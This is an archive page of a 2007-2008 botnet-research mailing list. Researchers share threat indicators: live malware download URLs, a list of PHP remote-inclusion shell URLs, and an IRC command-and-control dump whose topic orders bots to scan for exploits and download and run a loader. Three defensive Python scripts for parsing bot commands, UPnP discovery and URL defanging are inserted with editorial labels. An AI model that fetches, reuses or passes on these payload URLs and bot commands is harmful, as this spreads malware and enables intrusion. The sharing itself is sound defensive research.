Re: [botnets] Washington Post: Atrivo/Intercage, why are we peering with the American RBN? (fwd)
From: Marc Sachs [EMAIL PROTECTED]
To: 'Gadi Evron' [EMAIL PROTECTED]
Subject: RE: Washington Post: Atrivo/Intercage, why are we peering with the American RBN?

Unless I'm mis-reading this (or perhaps GBLX read Krebs' story and said good-bye to Atrivo/Intercage), it looks like they are no longer their upstream:

http://cidr-report.org/cgi-bin/as-report?as=AS27595&v=4&view=2.0

Marc
SANS ISC

-----Original Message-----
From: Gadi Evron [mailto:[EMAIL PROTECTED]
Sent: Friday, August 29, 2008 4:02 PM
To: [EMAIL PROTECTED]
Subject: Washington Post: Atrivo/Intercage, why are we peering with the American RBN?

Hi all.

This Washington Post story came out today:
http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as_major.html

In it, Brian Krebs discusses the SF Bay Area based Atrivo/Intercage, which has long been named as a bad actor, accused of shuffling abuse reports to different IP addresses and hosting criminals en masse, and often compared to RBN in maliciousness. The American RBN, if you like.

1. I realize this is a problematic issue, but when it is clear a network is so evil (as the story suggests they are), why are we still peering with them? Who currently provides them with transit? Are they aware of this news story?

If Lycos' "make spam not war" and Blue Security's Blue Frog were run out of hosting continually, this has been done before to some extent. This network is not in Russia or China, but in Silicon Valley.

2. On a different note, why is anyone still accepting their route announcements? I know some among us re-route RBN traffic to protect users. Do you see this as a valid solution for your networks? What ASNs belong to Atrivo, anyway?

Does anyone have more details as to the apparent evilness of Atrivo/Intercage, who can verify these reports? As researched as they are, and my personal experience aside, I'd like some more data before coming to conclusions.

Hostexploit released a document [PDF] on this very network, just now, which is helpful:
http://hostexploit.com/index.php?option=com_content&view=article&id=12&Itemid=15

Gadi.

___
botnets@, the public's dumping ground for maliciousness
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] URL format thread killed: back to scheduled programming
When a proposal on the subject is created, it will be shared with all of you.

For now... we are here to share, so let's share.

Gadi.
[botnets] nepenthes / honeypot dump list: volunteers and instructions
Hi all.

The honeypot dump mailing list is ready. Point your servers to report to: [EMAIL PROTECTED]

To get us started I am quoting Jeremy, who came up with the idea of us pointing our nepenthes sensors to a mailing list. He is providing simple instructions on how to get started using nepenthes, and how to point it to dump results to the new mailing list.

The mailing list which was created is at: [EMAIL PROTECTED]
Subscribe at: http://whitestar.linuxbox.org/mailman/listinfo/honeydump

Jeremy's how-to:

If you just want to get a nepenthes malware collection box up and running, there is a ready to run VMware appliance available at:
http://www.dalmatech.com/downloads/Nepenthes.20.zip

I have no affiliation with the company, but this VMware appliance is nice, precompiled, and has a great web interface.

Just edit submit-norman.conf like so, putting the list address in the "email" field:

    submit-norman
    {
        // this is the address where norman sandbox reports will be sent
        email   "[EMAIL PROTECTED]";
        urls    ("http://sandbox.norman.no/live_4.html",
                 "http://luigi.informatik.uni-mannheim.de/submit.php?action=verify");
    };

And then, in nepenthes.conf, uncomment the line:

    "submitnorman.so", "submit-norman.conf",

There is a little write-up on basic usage here:
http://www.securityfocus.com/infocus/1880

And the homepage for nepenthes is here:
http://nepenthes.mwcollect.org/
[botnets] Washington Post: Atrivo/Intercage, why are we peering with the American RBN?
This Washington Post story came out today:
http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as_major.html

I have some thoughts relating more to network operations, but some of you may be interested in following up on this.

In the story, Brian Krebs discusses the SF Bay Area based Atrivo/Intercage, which has long been named as a bad actor, accused of shuffling abuse reports to different IP addresses and hosting criminals en masse, and often compared to RBN in maliciousness. The American RBN, if you like.

1. I realize this is a problematic issue, but when it is clear a network is so evil (as the story suggests they are), why are we still peering with them? Who currently provides them with transit? Are they aware of this news story?

If Lycos' "make spam not war" and Blue Security's Blue Frog were run out of hosting continually, this has been done before to some extent. This network is not in Russia or China, but in Silicon Valley.

2. On a different note, why is anyone still accepting their route announcements? I know some among us re-route RBN traffic to protect users. Do you see this as a valid solution for your networks? What ASNs belong to Atrivo, anyway?

Does anyone have more details as to the apparent evilness of Atrivo/Intercage, who can verify these reports? As researched as they are, and my personal experience aside, I'd like some more data before coming to conclusions.

Hostexploit released a document [PDF] on this very network, just now, which is helpful:
http://hostexploit.com/index.php?option=com_content&view=article&id=12&Itemid=15

Gadi.
[botnets] reviving the botnets@ mailing list: a new strategy in fighting cyber crime
The public botnets@ mailing list, where malicious activity on the Internet can be openly shared, has been revived, and boy is it active.

Warning: live samples and malicious URLs are openly shared there.

Mailing list URL:
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Reasons, thinking and explanations:
http://gadievron.blogspot.com/2008/08/public-sharing-and-new-statregy-in.html

Excerpt:
--
A couple of years ago I started a mailing list where folks not necessarily involved with the vetted, trusted, closed and snobbish circles of cyber crime fighting (some founded by me) could share information and be informed of threats.

In this post I explore some of the history behind information sharing online, and explain the concept behind the botnets mailing list. Feel free to skip ahead if you find the history boring. Also, do note the history in this post is mixed with my own opinions. As I am one of the only people who were there in the beginning, though, and lived through all of it, I feel free to do so (in my own blog post).

As I conclude, we may not be able to always share our resources, but it is time to change the tide of the cyber crime war, and strategize. One of the strategies we need to use, or at least try, is public information sharing of lesser evils already in the public domain.

..
..

To fight a war, you have to be involved and engaged. On the Internet that is very difficult, but the Russians found a way.

It is a fact that while we made much progress in our efforts fighting cyber crime, we had nearly no effect whatsoever on the criminals and the attackers. None. They maintain their business and we play at writing analysis and whack-a-mole.

Using the botnets mailing list, I am borrowing a page from the apparent Russian cyber war doctrine, getting people involved, engaged. Personally aware and a part of what's going on.

It can't hurt us, and perhaps now, four years over-due and two years after the previous attempt, we may be ready to give it a go and test the concept.
---

Gadi Evron.

--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General, Israel's Ministry of Finance, at the government's CIO conference, 2005.
(after two very funny self-deprecation quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron
[botnets] facebook worms and id theft [was: Re: [phishing] XP update phish/malware]
> Interesting,
>
> Do you or anyone else know more about the account theft that has been going on with Facebook? I ask because my kid sister was using it for a while and she kept on asking why her password was changed. Shortly thereafter her friends had the same issue and they had random wall posts going up.
>
> Ideas? I'm just curious.

Malware spreading via walls and messages. Click on it and you get your credentials stolen and spam your friends.

Facebook.*

> Regards,
> Adriel T. Desautels
> Chief Technology Officer
> Netragard, LLC.
> Office : 617-934-0269
> Mobile : 617-633-3821
> http://www.linkedin.com/pub/1/118/a45
> Join the Netragard, LLC. Linked In Group:
> http://www.linkedin.com/e/gis/48683/0B98E1705142
> ---
> Netragard, LLC - http://www.netragard.com - "We make IT Safe"
> Penetration Testing, Vulnerability Assessments, Website Security
> Netragard Whitepaper Downloads:
> ---
> Choosing the right provider : http://tinyurl.com/2ahk3j
> Three Things you must know : http://tinyurl.com/26pjsn
>
> Steven Adair wrote:
>> It seems Imageshack with malicious or at least abusive Flash files is getting more popular. We saw a similar attack, yet far less malicious, on Facebook last week. Users' walls were spammed with a message about someone having a crush on them with a link to an Imageshack Flash file. The file then did a full redirect to a dating website. The bad guys are both simply just using them as a jumping point and in some cases playing off of their [somewhat] trusted name.
>>
>> Steven
>>
>> On Thu, 28 Aug 2008 09:18:12 -0400, "Discini, Sonny" [EMAIL PROTECTED] wrote:
>>>> Here is another XP/Vista download link:
>>>>
>>>> ht tp://img 182.imageshack.us/img182/7145/47024671do7 .swf
>>>>
>>>> -- Steve
>>>
>>> I had a bunch of that come through in 3 separate waves yesterday. The malware download pointed to:
>>>
>>> Hxxp://89.187.49.18/install.exe
>>>
>>> Note that the payload is known to Sophos so I'm assuming that most of the other big players also pick it up. Nothing new.
>>>
>>> Sonny
>>>
>>> Sonny Discini, Senior Network Security Engineer
>>> Office of the CIO
>>> Department of Technology Services
>>> Montgomery County Government
>>>
>>> -----Original Message-----
>>> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steve Pirk
>>> Sent: Thursday, August 28, 2008 7:13 AM
>>> To: [EMAIL PROTECTED]
>>> Cc: Botnets
>>> Subject: Re: [phishing] XP update phish/malware
>>>
>>> Equal bytes for women.
>>>
>>> On Wed, 27 Aug 2008, Steve Pirk wrote:
>>>> Here are some links related to a XP update phish/malware download.
>>>
>>> Image or payload?
>>>
>>>> ht tp://img 504.imageshack.us/img504/6262/23031231ob0 .swf
>>>
>>> That was the only link in the email.
>>>
>>> -- Steve
>>> Equal bytes for women.
>>>
>>> ___
>>> phishing mailing list
>>> [EMAIL PROTECTED]
>>> http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
Re: [botnets] URL formats
On Thu, 28 Aug 2008, Michael Collins wrote:
> It would be enormously helpful. Personal bias: I do a lot of data analysis on stuff collected by a bunch of groups, and my biggest headaches are always normalization and "how did you figure this out", so if we had a standard, that would make my life, personally, a lot easier. I'm willing to keep a hold of it and post a FAQ or other report on it on a regular basis if it'll make everyone else's life easier - it'll certainly make mine so.

Go for it. Sounds useful. Although I am not going to enforce it for at least a few weeks yet when we figure what and who we are.

> On Aug 28, 2008, at 1:32 PM, Chris Burton wrote:
>> Hi,
>>
>> I was wondering if it would be more helpful if we could propose a standard for posting broken URLs with some form of start/end indicator to allow easier automated processing from the listings?
>>
>> ChrisB.
Re: [botnets] URL formats
On Thu, 28 Aug 2008, fiberOptiC wrote:
> Are you asking about a standardized reporting format pertaining to all the information you have obtained and wish to share?

The suggestion was about URLs.

For now, people.. just share.

> On Thu, Aug 28, 2008 at 3:14 PM, Gadi Evron [EMAIL PROTECTED] wrote:
>> On Thu, 28 Aug 2008, Michael Collins wrote:
>>> It would be enormously helpful. Personal bias: I do a lot of data analysis on stuff collected by a bunch of groups, and my biggest headaches are always normalization and "how did you figure this out", so if we had a standard, that would make my life, personally, a lot easier. I'm willing to keep a hold of it and post a FAQ or other report on it on a regular basis if it'll make everyone else's life easier - it'll certainly make mine so.
>>
>> Go for it. Sounds useful. Although I am not going to enforce it for at least a few weeks yet when we figure what and who we are.
>>
>>> On Aug 28, 2008, at 1:32 PM, Chris Burton wrote:
>>>> Hi,
>>>>
>>>> I was wondering if it would be more helpful if we could propose a standard for posting broken URLs with some form of start/end indicator to allow easier automated processing from the listings?
>>>>
>>>> ChrisB.
[botnets] reviving this list, allowing sharing
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--

Hi.

When this list was started a while back a lot of sharing and discussion was happening. This made us take a step back at the time.

Today, when most of this information can do far more good than harm, it is my strong belief open information sharing on botnets, malicious web sites and similar subjects will be useful.

Feel free to share data, and let's see how it goes. We, on our end, will work to mitigate the risks you send in.

Who is first?

Gadi.

___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] fake AV (malicious) sites
bestantivirus2009 com

iframe with exploits:
huytegygle com/index.php --script
huytegygle com/bin/ file.exe

This information is from:
http://sunbeltblog.blogspot.com/2008/08/xp-antivirus-2008-now-with-sploits.html

Lots of Fake AV sites.
[botnets] Another bogus greeting card spamming a malware URL
Another bogus greeting card spamming a malware URL (again, one I've seen for a few days now and still live):

h ttp://u gm-records.de/e-card.exe

Detection wise... Someone already sent it to VT:
http://www.virustotal.com/analisis/50bf6f61971f349a5de651aa5515607f

As usual, several days later detection is minimal.

Gadi.
[botnets] CC: 195.5.216.10:7007
    Contacting server 195.5.216.10:7007
    Connection with 195.5.216.10:7007 (49153) established
    *** highkey,
    *** MAP KNOCK SAFELIST HCN MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
    *** WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=highkey CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
    *** MOTD File is missing

    Channel: ##http
    *** Topic for ##http: .asc -S|.asc netapi 50 5 0 -b -r -e|.asc asn445 50 5 0 -b -r -e|.asc rpc 50 5 0 -b -r -e|.it.wget http://bhxtakekep.net/loaderadv691.exe C:\s32bit.exe 1 -s
    *** Topic for ##http set by rdp on Thursday, August 28, 2008 12:43:22 AM
    *** End of /NAMES list.
    *** Channel Mode is +smntMu
    *** Channel created at Wednesday, August 27, 2008 11:48:46 PM
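The channel topic above is the bot tasking: "|"-separated commands telling bots which exploit module to scan with and which binary to fetch. The following is an added example, not part of the list post, that parses such a topic into structured commands and pulls out the indicators (download URLs, scan modules) you would feed a blocklist or IDS rule. Reading the three numbers after the module as threads/delay/duration follows the common rbot-family convention but is my assumption; the post does not say what they mean, and the sample topic is the one from the dump.

```python
"""Extract bot tasking from an IRC C&C channel topic.

Added example, not part of the list post. It parses topic strings like the
one above: "|"-separated commands, ".asc <module> <n> <n> <n> -flags" scan
orders and ".it.wget <url> <dest> ..." download orders. Reading the three
numbers as threads/delay/duration follows the common rbot-family convention
but is an assumption on my part; the post does not say what they mean.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Constructed sample: the topic shown in the dump above.
SAMPLE_TOPIC = (
    ".asc -S|.asc netapi 50 5 0 -b -r -e|.asc asn445 50 5 0 -b -r -e|"
    ".asc rpc 50 5 0 -b -r -e|"
    ".it.wget http://bhxtakekep.net/loaderadv691.exe C:\\s32bit.exe 1 -s"
)

_URL_RE = re.compile(r"^https?://", re.I)


@dataclass
class ScanCommand:
    module: Optional[str]            # exploit module to scan with; None for ".asc -S" (flags only)
    threads: Optional[int]           # assumed meaning of the first number
    delay: Optional[int]             # assumed meaning of the second number
    duration: Optional[int]          # assumed meaning of the third number
    flags: List[str] = field(default_factory=list)


@dataclass
class DownloadCommand:
    url: Optional[str]
    dest: Optional[str]
    args: List[str] = field(default_factory=list)


@dataclass
class UnknownCommand:
    raw: str


Command = Union[ScanCommand, DownloadCommand, UnknownCommand]


def _int_or_none(tok: str) -> Optional[int]:
    return int(tok) if tok.isdigit() else None


def _parse_asc(args: List[str]) -> ScanCommand:
    flags = [a for a in args if a.startswith("-")]
    positional = [a for a in args if not a.startswith("-")]
    module = positional[0] if positional else None
    nums = [_int_or_none(a) for a in positional[1:4]]
    nums += [None] * (3 - len(nums))            # pad short commands such as ".asc rpc 10"
    return ScanCommand(module, nums[0], nums[1], nums[2], flags)


def _parse_wget(args: List[str]) -> DownloadCommand:
    url = args[0] if args and _URL_RE.match(args[0]) else None
    dest = args[1] if len(args) > 1 else None
    return DownloadCommand(url, dest, args[2:])


def parse_topic(topic: str) -> List[Command]:
    """Split a topic on "|" and parse each command; unknown verbs are kept verbatim."""
    cmds: List[Command] = []
    for raw in topic.split("|"):
        raw = raw.strip()
        if not raw:
            continue
        tokens = raw.split()
        verb = tokens[0].lower()
        if verb == ".asc":
            cmds.append(_parse_asc(tokens[1:]))
        elif verb.endswith(".wget"):             # ".it.wget" and similar download verbs
            cmds.append(_parse_wget(tokens[1:]))
        else:
            cmds.append(UnknownCommand(raw))
    return cmds


def indicators(topic: str) -> dict:
    """De-duplicated download URLs and scan modules, in topic order, for a blocklist or IDS rule."""
    urls: List[str] = []
    modules: List[str] = []
    for c in parse_topic(topic):
        if isinstance(c, DownloadCommand) and c.url and c.url not in urls:
            urls.append(c.url)
        elif isinstance(c, ScanCommand) and c.module and c.module not in modules:
            modules.append(c.module)
    return {"urls": urls, "scan_modules": modules}


if __name__ == "__main__":
    for cmd in parse_topic(SAMPLE_TOPIC):
        print(cmd)
    print(indicators(SAMPLE_TOPIC))
```

Run it against a captured topic line and the "scan_modules" list tells you which services the bots were told to hit (here netapi, asn445 and rpc, i.e. SMB/RPC-facing ports) while "urls" gives the loader to block or submit for analysis.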
[botnets] downtime
I apologize for the list's downtime. We are working to assure this doesn't happen again.
[botnets] bot sniffing paper from georgia tech
BotSniffer: Detecting Botnet Command and Control Channels in Network Traffic
Guofei Gu, Junjie Zhang, and Wenke Lee
School of Computer Science, College of Computing, Georgia Institute of Technology

URL: http://www-static.cc.gatech.edu/~guofei/paper/Gu_NDSS08_botSniffer.pdf

Gadi.

--
*FART* -- Avi Freedman to Gadi Evron in a Chinese restaurant, Boston 2007.
[botnets] (broadband routers) PC World: Flash Attack Could Take Over Your Router
Props to Jeff Chan who I saw it from.

Yes, I still believe these ISP distributed machines called broadband routers are a network operators' issue. But not all may agree on that.

--
http://news.yahoo.com/s/pcworld/20080116/tc_pcworld/141399

Flash Attack Could Take Over Your Router
Robert McMillan, IDG News Service
Tue Jan 15, 7:08 PM ET

Security researchers have released code showing how a pair of widely used technologies could be misused to take control of a victim's Web browsing experience.

The code, published over the weekend by researchers Adrian Pastor and Petko Petkov, exploits features in two technologies: the Universal Plug and Play (UPnP) protocol, which is used by many operating systems to make it easier for them to work with devices on a network; and Adobe Systems' Flash multimedia software.

By tricking a victim into viewing a malicious Flash file, an attacker could use UPnP to change the primary DNS (Domain Name System) server used by the router to find other computers on the Internet. This would give the attacker a virtually undetectable way to redirect the victim to fake Web sites. For example, a victim with a compromised router could be taken to the attacker's Web server, even if he typed Citibank.com directly into the Web browser navigation bar.

"The most malicious of all malicious things is to change the primary DNS server," the researchers wrote. "That will effectively turn the router and the network it controls into a zombie which the attacker can take advantage of whenever they feel like it."

Because so many routers support UPnP, the researchers believe that "ninety nine percent" of home routers are vulnerable to this attack. In fact, many other types of UPnP devices, such as printers, digital entertainment systems and cameras are also potentially at risk, they added in a Frequently Asked Questions Web page explaining their research.

[...]
Re: [botnets] (broadband routers) PC World: Flash Attack Could TakeOver Your Router
On Wed, 16 Jan 2008, Steven Adair wrote:
> How are you defining network operators? Do you mean by the normal [in most cases home] user?
>
> Apparently Flash is able to allow UPnP access per PDP's posting at www.gnucitizen.org. Apparently this is not a flaw and is a feature (we've heard that before) of Flash and works as advertised. However, most of the broadband routers have UPnP open by default, so all a malicious SWF file has to do is start taking action via UPnP from your Linksys/NetGear/D-Link/etc. home router. You might want to look into disabling this function as it apparently doesn't support any form of authentication.
>
> Steven

Not me, I look at how many are out there, rather than the one home user, in this case.
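The practical check behind the two messages above is whether your router answers unauthenticated UPnP discovery from the LAN at all; if it does, a page loaded in a browser on that LAN can reach the same control endpoint. The script below is an added example, not from the article or the list, that builds an SSDP M-SEARCH request, parses the HTTP-over-UDP replies and lists who answered (LOCATION and SERVER headers). It changes nothing on the device. The multicast address, port and header names are from the UPnP Device Architecture; the sample reply embedded for offline use is constructed and its values made up.

```python
"""List devices on the LAN that answer UPnP/SSDP discovery.

Added example, not from the article or the list post. A reply means the
UPnP control URL (LOCATION) is reachable without authentication from the
LAN, which is the exposure the article describes. Nothing is modified.
"""
import socket

SSDP_ADDR = "239.255.255.250"   # SSDP multicast group per the UPnP Device Architecture
SSDP_PORT = 1900


def build_msearch(search_target: str = "upnp:rootdevice", mx: int = 2) -> bytes:
    """Build the M-SEARCH datagram; CRLF line endings and an empty line terminate it."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {SSDP_ADDR}:{SSDP_PORT}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {search_target}",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_ssdp_response(data: bytes):
    """Return lower-cased headers of an HTTP/1.1 200 OK reply, or None for anything else."""
    text = data.decode("utf-8", errors="replace")
    head, _, _ = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not lines or not lines[0].upper().startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")   # split on the first colon only; values contain URLs
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def discover(timeout: float = 3.0):
    """Send one M-SEARCH and collect (source ip, LOCATION, SERVER) for every responder."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.settimeout(timeout)
    sock.sendto(build_msearch(), (SSDP_ADDR, SSDP_PORT))
    found = []
    try:
        while True:
            data, (ip, _) = sock.recvfrom(65535)
            hdrs = parse_ssdp_response(data)
            if hdrs:
                found.append((ip, hdrs.get("location"), hdrs.get("server")))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found


# Constructed sample reply shaped like a typical router answer; addresses and names are made up.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"LOCATION: http://192.168.1.1:5000/rootDesc.xml\r\n"
    b"SERVER: Linux/2.4 UPnP/1.0 ExampleIGD/1.0\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for ip, location, server in discover():
        print(f"{ip}\t{server}\t{location}")
```

If your router shows up in the output, the device description at LOCATION points at the control service a malicious SWF would talk to; disabling UPnP on the router (or at least on the LAN-facing interface) and re-running the script until it stays silent is the fix Steven suggests.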
[botnets] test
Re: [botnets] Spam botnet discovered
On Mon, 5 Nov 2007, Interspace System Department wrote:
> The strange thing, that only you complaining about such behaviour ;)

I am not complaining, I am dictating.

Thanks again.

> Anyway, these links are safe, as these bots spread only through FTP (yes, stolen FTP accounts).
>
> Have fun,
> Dan
>
> Gadi Evron wrote:
>> On Mon, 5 Nov 2007, Interspace System Department wrote:
>>> Hi Gadi,
>>>
>>> I don't have time for all that obfu/deobfu games, take it as-is ;)
>>
>> I quite understand, but as much as I regret having to say it, take your very valuable information somewhere else. :)
>>
>> Let me explain my position:
>> These links get indexed, and at that point more web servers become compromised. I'd go as far as saying people can now seed your log so that you infect them when you report it and people follow links.
>>
>> Ethics and secure sharing are a bitch, but we have to live with them.
>>
>> I hope you understand.
>>
>>> Thanks,
>>> Dan
>>>
>>> Gadi Evron wrote:
>>>> On Mon, 5 Nov 2007, Interspace System Department wrote:
>>>>> Hi again!
>>>>>
>>>>> Hope you doing well ;)
>>>>
>>>> Thanks again for posting. :)
>>>>
>>>> When obfuscating links, www should be made into w ww.
Re: [botnets] Php inclusion locations for 04.11.2007
Please make them unlinkable, such as using hxxp://a bcd.com

We don't want them indexed in Google. :)

On Sun, 4 Nov 2007, Interspace System Department wrote:
> Hello,
>
> These links are actively used for PHP inclusion attempts. Valid for 04.11.2007.
>
> http://62.141.56.158/cmd.gif
> http://amygirl.chat.ru/images/image.txt
> http://baguscrew.net/alat/cmd.txt
> http://cherrygirl.h18.ru/images/cs.txt
> http://e-smkk.net/forum/gallery/id.txt
> http://eventtoday.com/bbs/skin/gallery_thum/safe.txt
> http://geocities.com/masterHANCUR/HANCUR.txt
> http://host5.chileadmin.com/~revista/media/help.txt
> http://productanarchy.com/gallery/g2data/smarty/id
> http://puterselect.com/modules/Neos_Chronos/id.txt
> http://rfidstore.it/catalog/images/blank_line.gif
> http://rh4m4.t35.com/s.txt
> http://s33xy.ifrance.com/r7
> http://stefaniak.myftp.biz/modules/Album/safe.txt
> http://stopandbid.com/uplimg/safe.txt
> http://www.catterickcaravans.com/images/echo.txt
> http://www.lasexta.net/templates/id.txt
> http://www.ownsyou.kit.net/v/safe.txt
> http://www.scan-bot.net/id.txt
> http://www.sznurki.vel.pl/webimages/id.txt
> http://www.thedreaming.com/cache/id.txt
> http://www.theoneluckypennyguy.com/cache/echo.txt
> http://www.zarha.org/pr.txt
> http://www.zendurl.com/a/animetnt/safe.txt
>
> Btw, I've been monitoring some C&C server which is responsible for all *.h18.ru/images/cs.txt and http://amygirl.chat.ru/images/image.txt attempts. Seems like they are Australian.
> Check here: http://groups.google.com/group/nzphpug/msg/766976ba1bfd51ea
>
> Thanks,
> Dan
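Both the "URL formats" thread earlier on this page (a start/end indicator so posts can be processed automatically) and the request just above (hxxp://, a space in the host, "w ww") are about the same problem: sharing live malicious URLs without making them clickable or indexable, while still letting a script recover them. The code below is an added example, not from either thread, showing one defang/refang pair that handles the forms used here. The start/end marker strings "[[URL:" and "]]" and the "[.]" dot form are my own choices, not a list standard; the sample post is constructed from the URL forms that appear in the messages above.

```python
"""Defang and refang URLs for posting to the list.

Added example (not from the thread). It covers the forms used or proposed
above: "hxxp://" for the scheme, a space inserted after the scheme or inside
the host ("h ttp://", "w ww", "a bcd.com"), and a start/end marker pair so a
script can find URLs in a post without guessing. The marker strings and the
"[.]" dot form are my own choices, not a list standard.
"""
import re

START, END = "[[URL:", "]]"          # assumed start/end indicators

# Scheme written with an optional single space anywhere in "http", or as hxxp.
_SCHEME = r"(?:h\s?t\s?t\s?p|hxxp)s?\s?:\s?//"
_LOOSE = re.compile(r"\b(" + _SCHEME + r")\s?(\S+)(?:[ ](\S+))?", re.I)
_MARKED = re.compile(re.escape(START) + r"(.*?)" + re.escape(END), re.S)


def defang(url: str) -> str:
    """Make a URL unlinkable and unindexable: hxxp scheme, [.] in the host, markers around it."""
    u = re.sub(r"^http(s?)://", r"hxxp\1://", url.strip(), flags=re.I)
    scheme, sep, rest = u.partition("://")
    host, slash, path = rest.partition("/")          # only the host gets [.]; the path is left alone
    return f"{START}{scheme}{sep}{host.replace('.', '[.]')}{slash}{path}{END}"


def refang_token(token: str) -> str:
    """Undo defanging on one URL string: drop inserted whitespace, restore dots and scheme."""
    t = re.sub(r"\s+", "", token)
    t = t.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", t, flags=re.I)


def refang_text(text: str) -> list:
    """Return every URL found in a post, refanged, marked ones first.

    Marked URLs are recovered exactly. Unmarked ones need a heuristic: if the
    chunk after the scheme has no dot ("a" in "hxxp://a bcd.com"), the host was
    split by a space and the next chunk is glued back on; otherwise the URL
    ends at the first space. That ambiguity is why start/end markers help.
    """
    found = []

    def take_marked(m):
        found.append(refang_token(m.group(1)))
        return " "          # blank it so the loose pass does not see it twice

    remaining = _MARKED.sub(take_marked, text)
    for m in _LOOSE.finditer(remaining):
        scheme, first, nxt = m.group(1), m.group(2), m.group(3)
        url = scheme + first
        if nxt and "." not in first:
            url += nxt
        found.append(refang_token(url))
    return found


# Constructed sample post using the URL forms seen in the messages above.
SAMPLE_POST = (
    "Please make them unlinkable such as using hxxp://a bcd.com\n"
    "greeting card: h ttp://u gm-records.de/e-card.exe\n"
    "payload: Hxxp://89.187.49.18/install.exe Note that the payload is known\n"
    + defang("http://62.141.56.158/cmd.gif") + "\n"
)

if __name__ == "__main__":
    for u in refang_text(SAMPLE_POST):
        print(u)
```

The loose pass is deliberately conservative: a URL whose path contains a space ("47024671do7 .swf" in the Imageshack links above) is cut short, which is exactly the kind of loss the proposed start/end indicator avoids.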
Re: [botnets] mac trojan in-the-wild
On Sun, 4 Nov 2007, Steven Adair wrote:
> On Sat, 3 Nov 2007 13:54:44 -0400, "Mr. X" [EMAIL PROTECTED] wrote:
>> Dude, you gotta get over yourself. The fact that the mac os x operating system has no viruses is not the fault of the user base. And the tirades of the told-you-so's are petty and so OT let's just get back to info on botnets. Anyone targeting the Mac or Linux base is
>
> I agree they are OT but technically isn't this entire thread, regardless of the view point? AFAIK there is not presently any botnet associated with this mac trojan or any variants of it at this time. There's definitely potential but no connection, otherwise we could be discussing any piece of malware on this list.

It's a trojan horse. It hijacks DNS and pwns people. Obviously there is a second stage of infection.

What do you think it is we do here?
Re: [botnets] mac trojan in-the-wild
On Sat, 3 Nov 2007, Tom wrote:
> (Sorry on Digest)
>
> Hey all give it a break. You want to discuss this / make a big deal about it then categorize it as a social engineering issue that occurs against not only any software platform but in most real life scams as well.
>
> I know many like to hype any issue against the OSX platform. To a certain degree this may indicate the increased targeting of OSX but it is interesting that the increased activity argument never seems to rise when the odd linux or unix social engineering exploit surfaces. Perhaps because none of us really know why an exploit was released or maybe because not a statistic does an isolated one off make?
>
> A single instance every now and again does not necessarily indicate a shift in targeting. Nor does a social engineering exploit attempt make a hype-able attack against OSX. Talk to you in 2 years.
>
> Seems like much ado... Now if everyone would change focus and help come up with aids to minimize the effectiveness of social engineering attacks (esp against neophyte and residential users) that would be something to write about.
>
> Just my 2 cents,
> Tom
Re: [botnets] mac trojan in-the-wild
On Thu, 1 Nov 2007, Jeremy Chatfield wrote:
> snip correct stuff
>
> And this has, so far, little to do with botnets... Unless this SE attack is installing a bot. Is it? What does the bot do? Is there a signature? That'd be interesting :)

Social engineering or vulnerabilities, the web is much of how bots propagate these days.

A trojan horse == bot. That's how we used to call them.
Re: [botnets] re MAC trojan
On Thu, 1 Nov 2007, Steven Adair wrote:
> Not sure this is necessarily true, but that's beside the point as I'm sure we could have hundreds of witty replies all day long going both ways. The point is this requires user interaction to infect a machine. I am not seeing the part where unpatched vulnerabilities come into play with this. This is no different than if someone had a malicious package sent for download. It requires the user to consent to install something bad.. this isn't a drive-by-exploit targeting all macs like MPack for primarily IE Windows.. not yet anyway. It's a good thing to be on the look out for though, however it's not the end of the internets.
>
> It's Mac season?
>
> Steven
>
> On Thu, 01 Nov 2007 16:35:11 +0200, Interspace System Department [EMAIL PROTECTED] wrote:
>> Gadi Evron wrote:
>>> On Thu, 1 Nov 2007, Gary Flynn wrote:
>>>> This is nothing more than simple downloadable malware exacerbated somewhat by permissive configuration settings. It exploits no security defects. As I understand it, the operator is given multiple opportunities to refuse the program:
>>>
>>> Yes, but it's who uses it and how that matters.
>>
>> Relax. MAC users are not that stupid as MS users...
>>
>>>> http://www.jmu.edu/computing/security/#macmalware
>>>>
>>>> (I'm only subscribed to the archive so I apologize if this has been already pointed out or already proven incorrect today)
[botnets] the heart of the problem [was: RE: mac trojan in-the-wild]
On Thu, 1 Nov 2007, Thor (Hammer of God) wrote:

> But more importantly, let's look at things from the other side. Let's say I'm wrong, and that Gadi is right on target with his "hit hard"

